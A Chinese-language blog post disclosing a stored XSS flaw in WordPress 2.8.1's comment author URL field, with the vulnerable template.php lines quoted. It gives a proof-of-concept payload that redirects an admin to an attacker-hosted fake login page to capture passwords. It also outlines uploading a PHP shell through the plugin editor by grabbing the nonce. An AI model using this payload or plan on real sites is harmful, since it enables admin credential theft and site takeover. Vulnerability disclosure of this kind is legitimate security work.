wordpress2.81评论显示xss漏洞

by kxlzx inbreak.net

ps:感谢鬼仔’blogXEYE’s blog协助测试。

实际上是个XSS漏洞。

POC:

XML/HTML代码

  1. 在评论的网址一栏,填写
  2. http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location.href=
  3. String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);

这段代码仅供测试,是不能直接用的。

如果你拿我的shellcode去打别人的站,那密码就归我了,来之不拒啊。

管理员审核时,只要鼠标从url上路过,就会跳转到http://www.inbreak.net/a.php

这里是个假的登录页面,钓鱼用。


管理员登录后,我们就能记录密码。


对于整个流程说明:

1,发评论让管理员对你的url有兴趣,然后等管理员上钩。

2,管理员在后台把鼠标移动到你的url上。

3,跳转到a.php,先获取referer。

4,输入密码后,提交到kxlzxtest/testxss/wp.php。

5,referer,user,pass保存为”域名.txt”。

6,输出一段JS,跳转到referer地址去。

a.php代码:

PHP代码

  1. <?php
  2. $website = $_SERVER[‘HTTP_REFERER’];
  3. $website=strtolower($website);
  4. $website=substr($website,7);
  5. $website=substr($website,0,strpos($website,‘/’));
  6. //这个页面是用来冒充登录页面的,危害巨大,代码不方便提供。
  7. ?>

wp.php代码

嗯。。。本来打算和某个短信平台配合一下,给我发短信提醒的,后来因为懒,就没写。

SHELL代码

  1. <?php
  2. //lv老子过滤。
  3. ?>

这只是个DEMO,实际上,后台有编辑PHP文件的功能,你可以写个AJAX出来,

自动获取编辑插件文件的页面中的token字段(名字忘记了,叫做XXonce),之后

提交一个PHP shell过去。就不用钓鱼了。

漏洞代码:

wordpress\wp-admin\includes\template.php

文件中的$author_url没有对单引号做过滤,最后又使用拼接href=’$author_url’。

导致我们可以添加一个这个href的事件函数进去。

PHP代码

  1. 2085:$author_url = get_comment_author_url();
  2. 2182:case ‘author’:
  3. echo “<td $attributes><strong>”; comment_author(); echo ‘</strong><br />’;
  4. if ( !emptyempty($author_url) )
  5. echo “<a title=’$author_url’ href=’$author_url’>$author_url_display</a><br />”;

前台的评论展示,也存在这个漏洞

修补方式:

不建议自己手工修补,建议把评论暂时关闭,然后等官方补丁就是了。

到目前为止,官方可能还不知道。

语言不通,好心人看到同时,可以通知下官方。

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>